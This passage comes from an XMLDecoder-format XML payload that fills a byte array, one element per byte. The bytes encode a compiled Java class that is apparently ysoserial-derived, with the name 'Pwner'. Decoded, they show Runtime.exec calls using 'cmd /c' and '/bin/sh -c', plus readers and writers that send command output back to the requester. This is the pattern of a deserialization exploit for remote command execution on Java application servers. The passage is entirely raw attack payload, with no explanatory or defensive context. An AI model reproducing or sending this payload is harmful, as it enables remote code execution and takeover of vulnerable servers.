index="2736"><byte>41</byte></void><void index="2737"><byte>76</byte></void><void index="2738"><byte>106</byte></void><void index="2739"><byte>97</byte></void><void index="2740"><byte>118</byte></void><void index="2741"><byte>97</byte></void><void index="2742"><byte>47</byte></void><void index="2743"><byte>108</byte></void><void index="2744"><byte>97</byte></void><void index="2745"><byte>110</byte></void><void index="2746"><byte>103</byte></void><void index="2747"><byte>47</byte></void><void index="2748"><byte>82</byte></void><void index="2749"><byte>117</byte></void><void index="2750"><byte>110</byte></void><void index="2751"><byte>116</byte></void><void index="2752"><byte>105</byte></void><void index="2753"><byte>109</byte></void><void index="2754"><byte>101</byte></void><void index="2755"><byte>59</byte></void><void index="2756"><byte>12</byte></void><void index="2757"><byte>0</byte></void><void index="2758"><byte>124</byte></void><void index="2759"><byte>0</byte></void><void index="2760"><byte>125</byte></void><void index="2761"><byte>10</byte></void><void index="2762"><byte>0</byte></void><void index="2763"><byte>123</byte></void><void index="2764"><byte>0</byte></void><void index="2765"><byte>126</byte></void><void index="2766"><byte>1</byte></void><void index="2767"><byte>0</byte></void><void index="2768"><byte>7</byte></void><void index="2769"><byte>99</byte></void><void index="2770"><byte>109</byte></void><void index="2771"><byte>100</byte></void><void index="2772"><byte>32</byte></void><void index="2773"><byte>47</byte></void><void index="2774"><byte>99</byte></void><void index="2775"><byte>32</byte></void><void index="2776"><byte>8</byte></void><void index="2777"><byte>0</byte></void><void index="2778"><byte>-128</byte></void><void index="2779"><byte>1</byte></void><void index="2780"><byte>0</byte></void><void index="2781"><byte>4</byte></void><void index="2782"><byte>101</byte></void><void index="2783"><byte>120</byte></void><void index="2784"><byte>101</byte></void><void index="2785"><byte>99</byte></void><void index="2786"><byte>1</byte></void><void index="2787"><byte>0</byte></void><void index="2788"><byte>39</byte></void><void index="2789"><byte>40</byte></void><void index="2790"><byte>76</byte></void><void index="2791"><byte>106</byte></void><void index="2792"><byte>97</byte></void><void index="2793"><byte>118</byte></void><void index="2794"><byte>97</byte></void><void index="2795"><byte>47</byte></void><void index="2796"><byte>108</byte></void><void index="2797"><byte>97</byte></void><void index="2798"><byte>110</byte></void><void index="2799"><byte>103</byte></void><void index="2800"><byte>47</byte></void><void index="2801"><byte>83</byte></void><void index="2802"><byte>116</byte></void><void index="2803"><byte>114</byte></void><void index="2804"><byte>105</byte></void><void index="2805"><byte>110</byte></void><void index="2806"><byte>103</byte></void><void index="2807"><byte>59</byte></void><void index="2808"><byte>41</byte></void><void index="2809"><byte>76</byte></void><void index="2810"><byte>106</byte></void><void index="2811"><byte>97</byte></void><void index="2812"><byte>118</byte></void><void index="2813"><byte>97</byte></void><void index="2814"><byte>47</byte></void><void index="2815"><byte>108</byte></void><void index="2816"><byte>97</byte></void><void index="2817"><byte>110</byte></void><void index="2818"><byte>103</byte></void><void index="2819"><byte>47</byte></void><void index="2820"><byte>80</byte></void><void index="2821"><byte>114</byte></void><void index="2822"><byte>111</byte></void><void index="2823"><byte>99</byte></void><void index="2824"><byte>101</byte></void><void index="2825"><byte>115</byte></void><void index="2826"><byte>115</byte></void><void index="2827"><byte>59</byte></void><void index="2828"><byte>12</byte></void><void index="2829"><byte>0</byte></void><void index="2830"><byte>-126</byte></void><void index="2831"><byte>0</byte></void><void index="2832"><byte>-125</byte></void><void index="2833"><byte>10</byte></void><void index="2834"><byte>0</byte></void><void index="2835"><byte>123</byte></void><void index="2836"><byte>0</byte></void><void index="2837"><byte>-124</byte></void><void index="2838"><byte>1</byte></void><void index="2839"><byte>0</byte></void><void index="2840"><byte>11</byte></void><void index="2841"><byte>47</byte></void><void index="2842"><byte>98</byte></void><void index="2843"><byte>105</byte></void><void index="2844"><byte>110</byte></void><void index="2845"><byte>47</byte></void><void index="2846"><byte>115</byte></void><void index="2847"><byte>104</byte></void><void index="2848"><byte>32</byte></void><void index="2849"><byte>45</byte></void><void index="2850"><byte>99</byte></void><void index="2851"><byte>32</byte></void><void index="2852"><byte>8</byte></void><void index="2853"><byte>0</byte></void><void index="2854"><byte>-122</byte></void><void index="2855"><byte>1</byte></void><void index="2856"><byte>0</byte></void><void index="2857"><byte>22</byte></void><void index="2858"><byte>106</byte></void><void index="2859"><byte>97</byte></void><void index="2860"><byte>118</byte></void><void index="2861"><byte>97</byte></void><void index="2862"><byte>47</byte></void><void index="2863"><byte>105</byte></void><void index="2864"><byte>111</byte></void><void index="2865"><byte>47</byte></void><void index="2866"><byte>66</byte></void><void index="2867"><byte>117</byte></void><void index="2868"><byte>102</byte></void><void index="2869"><byte>102</byte></void><void index="2870"><byte>101</byte></void><void index="2871"><byte>114</byte></void><void index="2872"><byte>101</byte></void><void index="2873"><byte>100</byte></void><void index="2874"><byte>82</byte></void><void index="2875"><byte>101</byte></void><void index="2876"><byte>97</byte></void><void index="2877"><byte>100</byte></void><void index="2878"><byte>101</byte></void><void index="2879"><byte>114</byte></void><void index="2880"><byte>7</byte></void><void index="2881"><byte>0</byte></void><void index="2882"><byte>-120</byte></void><void index="2883"><byte>1</byte></void><void index="2884"><byte>0</byte></void><void index="2885"><byte>25</byte></void><void index="2886"><byte>106</byte></void><void index="2887"><byte>97</byte></void><void index="2888"><byte>118</byte></void><void index="2889"><byte>97</byte></void><void index="2890"><byte>47</byte></void><void index="2891"><byte>105</byte></void><void index="2892"><byte>111</byte></void><void index="2893"><byte>47</byte></void><void index="2894"><byte>73</byte></void><void index="2895"><byte>110</byte></void><void index="2896"><byte>112</byte></void><void index="2897"><byte>117</byte></void><void index="2898"><byte>116</byte></void><void index="2899"><byte>83</byte></void><void index="2900"><byte>116</byte></void><void index="2901"><byte>114</byte></void><void index="2902"><byte>101</byte></void><void index="2903"><byte>97</byte></void><void index="2904"><byte>109</byte></void><void index="2905"><byte>82</byte></void><void index="2906"><byte>101</byte></void><void index="2907"><byte>97</byte></void><void index="2908"><byte>100</byte></void><void index="2909"><byte>101</byte></void><void index="2910"><byte>114</byte></void><void index="2911"><byte>7</byte></void><void index="2912"><byte>0</byte></void><void index="2913"><byte>-118</byte></void><void index="2914"><byte>1</byte></void><void index="2915"><byte>0</byte></void><void index="2916"><byte>17</byte></void><void index="2917"><byte>106</byte></void><void index="2918"><byte>97</byte></void><void index="2919"><byte>118</byte></void><void index="2920"><byte>97</byte></void><void index="2921"><byte>47</byte></void><void index="2922"><byte>108</byte></void><void index="2923"><byte>97</byte></void><void index="2924"><byte>110</byte></void><void index="2925"><byte>103</byte></void><void index="2926"><byte>47</byte></void><void index="2927"><byte>80</byte></void><void index="2928"><byte>114</byte></void><void index="2929"><byte>111</byte></void><void index="2930"><byte>99</byte></void><void index="2931"><byte>101</byte></void><void index="2932"><byte>115</byte></void><void index="2933"><byte>115</byte></void><void index="2934"><byte>7</byte></void><void index="2935"><byte>0</byte></void><void index="2936"><byte>-116</byte></void><void index="2937"><byte>1</byte></void><void index="2938"><byte>0</byte></void><void index="2939"><byte>14</byte></void><void index="2940"><byte>103</byte></void><void index="2941"><byte>101</byte></void><void index="2942"><byte>116</byte></void><void index="2943"><byte>73</byte></void><void index="2944"><byte>110</byte></void><void index="2945"><byte>112</byte></void><void index="2946"><byte>117</byte></void><void index="2947"><byte>116</byte></void><void index="2948"><byte>83</byte></void><void index="2949"><byte>116</byte></void><void index="2950"><byte>114</byte></void><void index="2951"><byte>101</byte></void><void index="2952"><byte>97</byte></void><void index="2953"><byte>109</byte></void><void index="2954"><byte>1</byte></void><void index="2955"><byte>0</byte></void><void index="2956"><byte>23</byte></void><void index="2957"><byte>40</byte></void><void index="2958"><byte>41</byte></void><void index="2959"><byte>76</byte></void><void index="2960"><byte>106</byte></void><void index="2961"><byte>97</byte></void><void index="2962"><byte>118</byte></void><void index="2963"><byte>97</byte></void><void index="2964"><byte>47</byte></void><void index="2965"><byte>105</byte></void><void index="2966"><byte>111</byte></void><void index="2967"><byte>47</byte></void><void index="2968"><byte>73</byte></void><void index="2969"><byte>110</byte></void><void index="2970"><byte>112</byte></void><void index="2971"><byte>117</byte></void><void index="2972"><byte>116</byte></void><void index="2973"><byte>83</byte></void><void index="2974"><byte>116</byte></void><void index="2975"><byte>114</byte></void><void index="2976"><byte>101</byte></void><void index="2977"><byte>97</byte></void><void index="2978"><byte>109</byte></void><void index="2979"><byte>59</byte></void><void index="2980"><byte>12</byte></void><void index="2981"><byte>0</byte></void><void index="2982"><byte>-114</byte></void><void index="2983"><byte>0</byte></void><void index="2984"><byte>-113</byte></void><void index="2985"><byte>10</byte></void><void index="2986"><byte>0</byte></void><void index="2987"><byte>-115</byte></void><void index="2988"><byte>0</byte></void><void index="2989"><byte>-112</byte></void><void index="2990"><byte>1</byte></void><void index="2991"><byte>0</byte></void><void index="2992"><byte>42</byte></void><void index="2993"><byte>40</byte></void><void index="2994"><byte>76</byte></void><void index="2995"><byte>106</byte></void><void index="2996"><byte>97</byte></void><void index="2997"><byte>118</byte></void><void index="2998"><byte>97</byte></void><void index="2999"><byte>47</byte></void><void index="3000"><byte>105</byte></void><void index="3001"><byte>111</byte></void><void index="3002"><byte>47</byte></void><void index="3003"><byte>73</byte></void><void index="3004"><byte>110</byte></void><void index="3005"><byte>112</byte></void><void index="3006"><byte>117</byte></void><void index="3007"><byte>116</byte></void><void index="3008"><byte>83</byte></void><void index="3009"><byte>116</byte></void><void index="3010"><byte>114</byte></void><void index="3011"><byte>101</byte></void><void index="3012"><byte>97</byte></void><void index="3013"><byte>109</byte></void><void index="3014"><byte>59</byte></void><void index="3015"><byte>76</byte></void><void index="3016"><byte>106</byte></void><void index="3017"><byte>97</byte></void><void index="3018"><byte>118</byte></void><void index="3019"><byte>97</byte></void><void index="3020"><byte>47</byte></void><void index="3021"><byte>108</byte></void><void index="3022"><byte>97</byte></void><void index="3023"><byte>110</byte></void><void index="3024"><byte>103</byte></void><void index="3025"><byte>47</byte></void><void index="3026"><byte>83</byte></void><void index="3027"><byte>116</byte></void><void index="3028"><byte>114</byte></void><void index="3029"><byte>105</byte></void><void index="3030"><byte>110</byte></void><void index="3031"><byte>103</byte></void><void index="3032"><byte>59</byte></void><void index="3033"><byte>41</byte></void><void index="3034"><byte>86</byte></void><void index="3035"><byte>12</byte></void><void index="3036"><byte>0</byte></void><void index="3037"><byte>10</byte></void><void index="3038"><byte>0</byte></void><void index="3039"><byte>-110</byte></void><void index="3040"><byte>10</byte></void><void index="3041"><byte>0</byte></void><void index="3042"><byte>-117</byte></void><void index="3043"><byte>0</byte></void><void index="3044"><byte>-109</byte></void><void index="3045"><byte>1</byte></void><void index="3046"><byte>0</byte></void><void index="3047"><byte>19</byte></void><void index="3048"><byte>40</byte></void><void index="3049"><byte>76</byte></void><void index="3050"><byte>106</byte></void><void index="3051"><byte>97</byte></void><void index="3052"><byte>118</byte></void><void index="3053"><byte>97</byte></void><void index="3054"><byte>47</byte></void><void index="3055"><byte>105</byte></void><void index="3056"><byte>111</byte></void><void index="3057"><byte>47</byte></void><void index="3058"><byte>82</byte></void><void index="3059"><byte>101</byte></void><void index="3060"><byte>97</byte></void><void index="3061"><byte>100</byte></void><void index="3062"><byte>101</byte></void><void index="3063"><byte>114</byte></void><void index="3064"><byte>59</byte></void><void index="3065"><byte>41</byte></void><void index="3066"><byte>86</byte></void><void index="3067"><byte>12</byte></void><void index="3068"><byte>0</byte></void><void index="3069"><byte>10</byte></void><void index="3070"><byte>0</byte></void><void index="3071"><byte>-107</byte></void><void index="3072"><byte>10</byte></void><void index="3073"><byte>0</byte></void><void index="3074"><byte>-119</byte></void><void index="3075"><byte>0</byte></void><void index="3076"><byte>-106</byte></void><void index="3077"><byte>1</byte></void><void index="3078"><byte>0</byte></void><void index="3079"><byte>0</byte></void><void index="3080"><byte>8</byte></void><void index="3081"><byte>0</byte></void><void index="3082"><byte>-104</byte></void><void index="3083"><byte>1</byte></void><void index="3084"><byte>0</byte></void><void index="3085"><byte>8</byte></void><void index="3086"><byte>114</byte></void><void index="3087"><byte>101</byte></void><void index="3088"><byte>97</byte></void><void index="3089"><byte>100</byte></void><void index="3090"><byte>76</byte></void><void index="3091"><byte>105</byte></void><void index="3092"><byte>110</byte></void><void index="3093"><byte>101</byte></void><void index="3094"><byte>12</byte></void><void index="3095"><byte>0</byte></void><void index="3096"><byte>-102</byte></void><void index="3097"><byte>0</byte></void><void index="3098"><byte>90</byte></void><void index="3099"><byte>10</byte></void><void index="3100"><byte>0</byte></void><void index="3101"><byte>-119</byte></void><void index="3102"><byte>0</byte></void><void index="3103"><byte>-101</byte></void><void index="3104"><byte>1</byte></void><void index="3105"><byte>0</byte></void><void index="3106"><byte>9</byte></void><void index="3107"><byte>103</byte></void><void index="3108"><byte>101</byte></void><void index="3109"><byte>116</byte></void><void index="3110"><byte>87</byte></void><void index="3111"><byte>114</byte></void><void index="3112"><byte>105</byte></void><void index="3113"><byte>116</byte></void><void index="3114"><byte>101</byte></void><void index="3115"><byte>114</byte></void><void index="3116"><byte>1</byte></void><void index="3117"><byte>0</byte></void><void index="3118"><byte>23</byte></void><void index="3119"><byte>40</byte></void><void index="3120"><byte>41</byte></void><void index="3121"><byte>76</byte></void><void index="3122"><byte>106</byte></void><void index="3123"><byte>97</byte></void><void index="3124"><byte>118</byte></void><void index="3125"><byte>97</byte></void><void index="3126"><byte>47</byte></void><void index="3127"><byte>105</byte></void><void index="3128"><byte>111</byte></void><void index="3129"><byte>47</byte></void><void index="3130"><byte>80</byte></void><void index="3131"><byte>114</byte></void><void index="3132"><byte>105</byte></void><void index="3133"><byte>110</byte></void><void index="3134"><byte>116</byte></void><void index="3135"><byte>87</byte></void><void index="3136"><byte>114</byte></void><void index="3137"><byte>105</byte></void><void index="3138"><byte>116</byte></void><void index="3139"><byte>101</byte></void><void index="3140"><byte>114</byte></void><void index="3141"><byte>59</byte></void><void index="3142"><byte>12</byte></void><void index="3143"><byte>0</byte></void><void index="3144"><byte>-99</byte></void><void index="3145"><byte>0</byte></void><void index="3146"><byte>-98</byte></void><void index="3147"><byte>10</byte></void><void index="3148"><byte>0</byte></void><void index="3149"><byte>69</byte></void><void index="3150"><byte>0</byte></void><void index="3151"><byte>-97</byte></void><void index="3152"><byte>1</byte></void><void index="3153"><byte>0</byte></void><void index="3154"><byte>19</byte></void><void index="3155"><byte>106</byte></void><void index="3156"><byte>97</byte></void><void index="3157"><byte>118</byte></void><void index="3158"><byte>97</byte></void><void index="3159"><byte>47</byte></void><void index="3160"><byte>105</byte></void><void index="3161"><byte>111</byte></void><void index="3162"><byte>47</byte></void><void index="3163"><byte>80</byte></void><void index="3164"><byte>114</byte></void><void index="3165"><byte>105</byte></void><void index="3166"><byte>110</byte></void><void index="3167"><byte>116</byte></void><void index="3168"><byte>87</byte></void><void index="3169"><byte>114</byte></void><void index="3170"><byte>105</byte></void><void index="3171"><byte>116</byte></void><void index="3172"><byte>101</byte></void><void index="3173"><byte>114</byte></void><void index="3174"><byte>7</byte></void><void index="3175"><byte>0</byte></void><void index="3176"><byte>-95</byte></void><void index="3177"><byte>1</byte></void><void index="3178"><byte>0</byte></void><void index="3179"><byte>5</byte></void><void index="3180"><byte>119</byte></void><void index="3181"><byte>114</byte></void><void index="3182"><byte>105</byte></void><void index="3183"><byte>116</byte></void><void index="3184"><byte>101</byte></void><void index="3185"><byte>12</byte></void><void index="3186"><byte>0</byte></void><void index="3187"><byte>-93</byte></void><void index="3188"><byte>0</byte></void><void index="3189"><byte>71</byte></void><void index="3190"><byte>10</byte></void><void index="3191"><byte>0</byte></void><void index="3192"><byte>-94</byte></void><void index="3193"><byte>0</byte></void><void index="3194"><byte>-92</byte></void><void index="3195"><byte>1</byte></void><void index="3196"><byte>0</byte></void><void index="3197"><byte>19</byte></void><void index="3198"><byte>106</byte></void><void index="3199"><byte>97</byte></void><void index="3200"><byte>118</byte></void><void index="3201"><byte>97</byte></void><void index="3202"><byte>47</byte></void><void index="3203"><byte>108</byte></void><void index="3204"><byte>97</byte></void><void index="3205"><byte>110</byte></void><void index="3206"><byte>103</byte></void><void index="3207"><byte>47</byte></void><void index="3208"><byte>69</byte></void><void index="3209"><byte>120</byte></void><void index="3210"><byte>99</byte></void><void index="3211"><byte>101</byte></void><void index="3212"><byte>112</byte></void><void index="3213"><byte>116</byte></void><void index="3214"><byte>105</byte></void><void index="3215"><byte>111</byte></void><void index="3216"><byte>110</byte></void><void index="3217"><byte>7</byte></void><void index="3218"><byte>0</byte></void><void index="3219"><byte>-90</byte></void><void index="3220"><byte>1</byte></void><void index="3221"><byte>0</byte></void><void index="3222"><byte>3</byte></void><void index="3223"><byte>111</byte></void><void index="3224"><byte>117</byte></void><void index="3225"><byte>116</byte></void><void index="3226"><byte>1</byte></void><void index="3227"><byte>0</byte></void><void index="3228"><byte>21</byte></void><void index="3229"><byte>76</byte></void><void index="3230"><byte>106</byte></void><void index="3231"><byte>97</byte></void><void index="3232"><byte>118</byte></void><void index="3233"><byte>97</byte></void><void index="3234"><byte>47</byte></void><void index="3235"><byte>105</byte></void><void index="3236"><byte>111</byte></void><void index="3237"><byte>47</byte></void><void index="3238"><byte>80</byte></void><void index="3239"><byte>114</byte></void><void index="3240"><byte>105</byte></void><void index="3241"><byte>110</byte></void><void index="3242"><byte>116</byte></void><void index="3243"><byte>83</byte></void><void index="3244"><byte>116</byte></void><void index="3245"><byte>114</byte></void><void index="3246"><byte>101</byte></void><void index="3247"><byte>97</byte></void><void index="3248"><byte>109</byte></void><void index="3249"><byte>59</byte></void><void index="3250"><byte>12</byte></void><void index="3251"><byte>0</byte></void><void index="3252"><byte>-88</byte></void><void index="3253"><byte>0</byte></void><void index="3254"><byte>-87</byte></void><void index="3255"><byte>9</byte></void><void index="3256"><byte>0</byte></void><void index="3257"><byte>107</byte></void><void index="3258"><byte>0</byte></void><void index="3259"><byte>-86</byte></void><void index="3260"><byte>1</byte></void><void index="3261"><byte>0</byte></void><void index="3262"><byte>19</byte></void><void index="3263"><byte>106</byte></void><void index="3264"><byte>97</byte></void><void index="3265"><byte>118</byte></void><void index="3266"><byte>97</byte></void><void index="3267"><byte>47</byte></void><void index="3268"><byte>108</byte></void><void index="3269"><byte>97</byte></void><void index="3270"><byte>110</byte></void><void index="3271"><byte>103</byte></void><void index="3272"><byte>47</byte></void><void index="3273"><byte>84</byte></void><void index="3274"><byte>104</byte></void><void index="3275"><byte>114</byte></void><void index="3276"><byte>111</byte></void><void index="3277"><byte>119</byte></void><void index="3278"><byte>97</byte></void><void index="3279"><byte>98</byte></void><void index="3280"><byte>108</byte></void><void index="3281"><byte>101</byte></void><void index="3282"><byte>7</byte></void><void index="3283"><byte>0</byte></void><void index="3284"><byte>-84</byte></void><void index="3285"><byte>10</byte></void><void index="3286"><byte>0</byte></void><void index="3287"><byte>-83</byte></void><void index="3288"><byte>0</byte></void><void index="3289"><byte>91</byte></void><void index="3290"><byte>1</byte></void><void index="3291"><byte>0</byte></void><void index="3292"><byte>19</byte></void><void index="3293"><byte>106</byte></void><void index="3294"><byte>97</byte></void><void index="3295"><byte>118</byte></void><void index="3296"><byte>97</byte></void><void index="3297"><byte>47</byte></void><void index="3298"><byte>105</byte></void><void index="3299"><byte>111</byte></void><void index="3300"><byte>47</byte></void><void index="3301"><byte>80</byte></void><void index="3302"><byte>114</byte></void><void index="3303"><byte>105</byte></void><void index="3304"><byte>110</byte></void><void index="3305"><byte>116</byte></void><void index="3306"><byte>83</byte></void><void index="3307"><byte>116</byte></void><void index="3308"><byte>114</byte></void><void index="3309"><byte>101</byte></void><void index="3310"><byte>97</byte></void><void index="3311"><byte>109</byte></void><void index="3312"><byte>7</byte></void><void index="3313"><byte>0</byte></void><void index="3314"><byte>-81</byte></void><void index="3315"><byte>1</byte></void><void index="3316"><byte>0</byte></void><void index="3317"><byte>7</byte></void><void index="3318"><byte>112</byte></void><void index="3319"><byte>114</byte></void><void index="3320"><byte>105</byte></void><void index="3321"><byte>110</byte></void><void index="3322"><byte>116</byte></void><void index="3323"><byte>108</byte></void><void index="3324"><byte>110</byte></void><void index="3325"><byte>12</byte></void><void index="3326"><byte>0</byte></void><void index="3327"><byte>-79</byte></void><void index="3328"><byte>0</byte></void><void index="3329"><byte>71</byte></void><void index="3330"><byte>10</byte></void><void index="3331"><byte>0</byte></void><void index="3332"><byte>-80</byte></void><void index="3333"><byte>0</byte></void><void index="3334"><byte>-78</byte></void><void index="3335"><byte>1</byte></void><void index="3336"><byte>0</byte></void><void index="3337"><byte>15</byte></void><void index="3338"><byte>112</byte></void><void index="3339"><byte>114</byte></void><void index="3340"><byte>105</byte></void><void index="3341"><byte>110</byte></void><void index="3342"><byte>116</byte></void><void index="3343"><byte>83</byte></void><void index="3344"><byte>116</byte></void><void index="3345"><byte>97</byte></void><void index="3346"><byte>99</byte></void><void index="3347"><byte>107</byte></void><void index="3348"><byte>84</byte></void><void index="3349"><byte>114</byte></void><void index="3350"><byte>97</byte></void><void index="3351"><byte>99</byte></void><void index="3352"><byte>101</byte></void><void index="3353"><byte>12</byte></void><void index="3354"><byte>0</byte></void><void index="3355"><byte>-76</byte></void><void index="3356"><byte>0</byte></void><void index="3357"><byte>11</byte></void><void index="3358"><byte>10</byte></void><void index="3359"><byte>0</byte></void><void index="3360"><byte>-83</byte></void><void index="3361"><byte>0</byte></void><void index="3362"><byte>-75</byte></void><void index="3363"><byte>1</byte></void><void index="3364"><byte>0</byte></void><void index="3365"><byte>13</byte></void><void index="3366"><byte>83</byte></void><void index="3367"><byte>116</byte></void><void index="3368"><byte>97</byte></void><void index="3369"><byte>99</byte></void><void index="3370"><byte>107</byte></void><void index="3371"><byte>77</byte></void><void index="3372"><byte>97</byte></void><void index="3373"><byte>112</byte></void><void index="3374"><byte>84</byte></void><void index="3375"><byte>97</byte></void><void index="3376"><byte>98</byte></void><void index="3377"><byte>108</byte></void><void index="3378"><byte>101</byte></void><void index="3379"><byte>1</byte></void><void index="3380"><byte>0</byte></void><void index="3381"><byte>29</byte></void><void index="3382"><byte>121</byte></void><void index="3383"><byte>115</byte></void><void index="3384"><byte>111</byte></void><void index="3385"><byte>115</byte></void><void index="3386"><byte>101</byte></void><void index="3387"><byte>114</byte></void><void index="3388"><byte>105</byte></void><void index="3389"><byte>97</byte></void><void index="3390"><byte>108</byte></void><void index="3391"><byte>47</byte></void><void index="3392"><byte>80</byte></void><void index="3393"><byte>119</byte></void><void index="3394"><byte>110</byte></void><void index="3395"><byte>101</byte></void><void index="3396"><byte>114</byte></void><void index="3397"><byte>52</byte></void><void index="3398"><byte>53</byte></void><void index="3399"><byte>52</byte></void><void index="3400"><byte>51</byte></void><void index="3401"><byte>56</byte></void><void index="3402"><byte>51</byte></void><void index="3403"><byte>49</byte></void><void index="3404"><byte>52</byte></void><void index="3405"><byte>50</byte></void><void index="3406"><byte>55</byte></void><void index="3407"><byte>56</byte></void><void index="3408"><byte>57</byte></void><void index="3409"><byte>57</byte></void><void index="3410"><byte>50</byte></void><void index="3411"><byte>1</byte></void><void index="3412"><byte>0</byte></void><void index="3413"><byte>31</byte></void><void index="3414"><byte>76</byte></void><void index="3415"><byte>121</byte></void><void index="3416"><byte>115</byte></void><void index="3417"><byte>111</byte></void><void index="3418"><byte>115</byte></void><void index="3419"><byte>101</byte></void><void index="3420"><byte>114</byte></void><void index="3421"><byte>105</byte></void><void index="3422"><byte>97</byte></void><void index="3423"><byte>108</byte></void><void index="3424"><byte>47</byte></void><void index="3425"><byte>80</byte></void><void index="3426"><byte>119</byte></void><void index="3427"><byte>110</byte></void><void index="3428"><byte>101</byte></void><void index="3429"><byte>114</byte></void><void index="3430"><byte>52</byte></void><void index="3431"><byte>53</byte></void><void index="3432"><byte>52</byte></void><void index="3433"><byte>51</byte></void><void index="3434"><byte>56</byte></void><void index="3435"><byte>51</byte></void><void index="3436"><byte>49</byte></void><void index="3437"><byte>52</byte></void><void index="3438"><byte>50</byte></void><void index="3439"><byte>55</byte></void><void index="3440"><byte>56</byte></void><void index="3441"><byte>57</byte></void><void index="3442"><byte>57</byte></void><void index="3443"><byte>50</byte></void><void index="3444"><byte>59</byte></void><void index="3445"><byte>0</byte></void><void index="3446"><byte>33</byte></void><void index="3447"><byte>0</byte></void><void index="3448"><byte>2</byte></void><void index="3449"><byte>0</byte></void><void index="3450"><byte>3</byte></void><void index="3451"><byte>0</byte></void><void index="3452"><byte>1</byte></void><void index="3453"><byte>0</byte></void><void index="3454"><byte>4</byte></void><void index="3455"><byte>0</byte></void><void index="3456"><byte>1</byte></void><void index="3457"><byte>0</byte></void><void index="3458"><byte>26</byte></void><void index="3459"><byte>0</byte></void><void index="3460"><byte>5</byte></void><void index="3461"><byte>0</byte></void><void index="3462"><byte>6</byte></void><void index="3463"><byte>0</byte></void><void index="3464"><byte>1</byte></void><void index="3465"><byte>0</byte></void><void index="3466"><byte>7</byte></void><void index="3467"><byte>0</byte></void><void index="3468"><byte>0</byte></void><void index="3469"><byte>0</byte></void><void index="3470"><byte>2</byte></void><void index="3471"><byte>0</byte></void><void index="3472"><byte>8</byte></void><void index="3473"><byte>0</byte></void><void index="3474"><byte>4</byte></void><void index="3475"><byte>0</byte></void><void index="3476"><byte>1</byte></void><void index="3477"><byte>0</byte></void><void index="3478"><byte>10</byte></void><void index="3479"><byte>0</byte></void><void index="3480"><byte>11</byte></void><void index="3481"><byte>0</byte></void><void index="3482"><byte>1</byte></void><void index="3483"><byte>0</byte></void><void index="3484"><byte>12</byte></void><void index="3485"><byte>0</byte></void><void index="3486"><byte>0</byte></void><void index="3487"><byte>0</byte></void><void index="3488"><byte>47</byte></void><void index="3489"><byte>0</byte></void><void index="3490"><byte>1</byte></void><void index="3491"><byte>0</byte></void><void index="3492"><byte>1</byte></void><void index="3493"><byte>0</byte></void><void index="3494"><byte>0</byte></void><void index="3495"><byte>0</byte></void><void index="3496"><byte>5</byte></void><void index="3497"><byte>42</byte></void><void index="3498"><byte>-73</byte></void><void index="3499"><byte>0</byte></void><void index="3500"><byte>1</byte></void><void index="3501"><byte>-79</byte></void><void index="3502"><byte>0</byte></void><void index="3503"><byte>0</byte></void><void index="3504"><byte>0</byte></void><void index="3505"><byte>2</byte></void><void index="3506"><byte>0</byte></void><void index="3507"><byte>13</byte></void><void index="3508"><byte>0</byte></void><void index="3509"><byte>0</byte></void><void index="3510"><byte>0</byte></void><void index="3511"><byte>6</byte></void><void index="3512"><byte>0</byte></void><void index="3513"><byte>1</byte></void><void index="3514"><byte>0</byte></void><void index="3515"><byte>0</byte></void><void index="3516"><byte>0</byte></void><void index="3517"><byte>47</byte></void><void index="3518"><byte>0</byte></void><void index="3519"><byte>14</byte></void><void index="3520"><byte>0</byte></void><void index="3521"><byte>0</byte></void><void index="3522"><byte>0</byte></void><void index="3523"><byte>12</byte></void><void index="3524"><byte>0</byte></void><void index="3525"><byte>1</byte></void><void index="3526"><byte>0</byte></void><void index="3527"><byte>0</byte></void><void index="3528"><byte>0</byte></void><void index="3529"><byte>5</byte></void><void index="3530"><byte>0</byte></void><void index="3531"><byte>15</byte></void><void index="3532"><byte>0</byte></void><void index="3533"><byte>-71</byte></void><void index="3534"><byte>0</byte></void><void index="3535"><byte>0</byte></void><void index="3536"><byte>0</byte></void><void index="3537"><byte>1</byte></void><void index="3538"><byte>0</byte></void><void index="3539"><byte>19</byte></void><void index="3540"><byte>0</byte></void><void index="3541"><byte>20</byte></void><void index="3542"><byte>0</byte></void><void index="3543"><byte>2</byte></void><void index="3544"><byte>0</byte></void><void index="3545"><byte>12</byte></void><void index="3546"><byte>0</byte></void><void index="3547"><byte>0</byte></void><void index="3548"><byte>0</byte></void><void index="3549"><byte>63</byte></void><void index="3550"><byte>0</byte></void><void index="3551"><byte>0</byte></void><void index="3552"><byte>0</byte></void><void index="3553"><byte>3</byte></void><void index="3554"><byte>0</byte></void><void index="3555"><byte>0</byte></void><void index="3556"><byte>0</byte></void><void index="3557"><byte>1</byte></void><void index="3558"><byte>-79</byte></void><void index="3559"><byte>0</byte></void><void index="3560"><byte>0</byte></void><void index="3561"><byte>0</byte></void><void index="3562"><byte>2</byte></void><void index="3563"><byte>0</byte></void><void index="3564"><byte>13</byte></void><void index="3565"><byte>0</byte></void><void index="3566"><byte>0</byte></void><void index="3567"><byte>0</byte></void><void index="3568"><byte>6</byte></void><void index="3569"><byte>0</byte></void><void index="3570"><byte>1</byte></void><void index="3571"><byte>0</byte></void><void index="3572"><byte>0</byte></void><void index="3573"><byte>0</byte></void><void index="3574"><byte>52</byte></void><void index="3575"><byte>0</byte></void><void index="3576"><byte>14</byte></void><void index="3577"><byte>0</byte></void><void index="3578"><byte>0</byte></void><void index="3579"><byte>0</byte></void><void index="3580"><byte>32</byte></void><void index="3581"><byte>0</byte></void><void index="3582"><byte>3</byte></void><void index="3583"><byte>0</byte></void><void index="3584"><byte>0</byte></void><void index="3585"><byte>0</byte></void><void index="3586"><byte>1</byte></void><void index="3587"><byte>0</byte></void><void index="3588"><byte>15</byte></void><void index="3589"><byte>0</byte></void><void index="3590"><byte>-71</byte></void><void index="3591"><byte>0</byte></void><void index="3592"><byte>0</byte></void><void index="3593"><byte>0</byte></void><void index="3594"><byte>0</byte></void><void index="3595"><byte>0</byte></void><void index="3596"><byte>1</byte></void><void index="3597"><byte>0</byte></void><void index="3598"><byte>21</byte></void><void index="3599"><byte>0</byte></void><void index="3600"><byte>22</byte></void><void index="3601"><byte>0</byte></void><void index="3602"><byte>1</byte></void><void index="3603"><byte>0</byte></void><void index="3604"><byte>0</byte></void><void index="3605"><byte>0</byte></void><void index="3606"><byte>1</byte></void><void index="3607"><byte>0</byte></void><void index="3608"><byte>23</byte></void><void index="3609"><byte>0</byte></void><void index="3610"><byte>24</byte></void><void index="3611"><byte>0</byte></void><void index="3612"><byte>2</byte></void><void index="3613"><byte>0</byte></void><void index="3614"><byte>25</byte></void><void 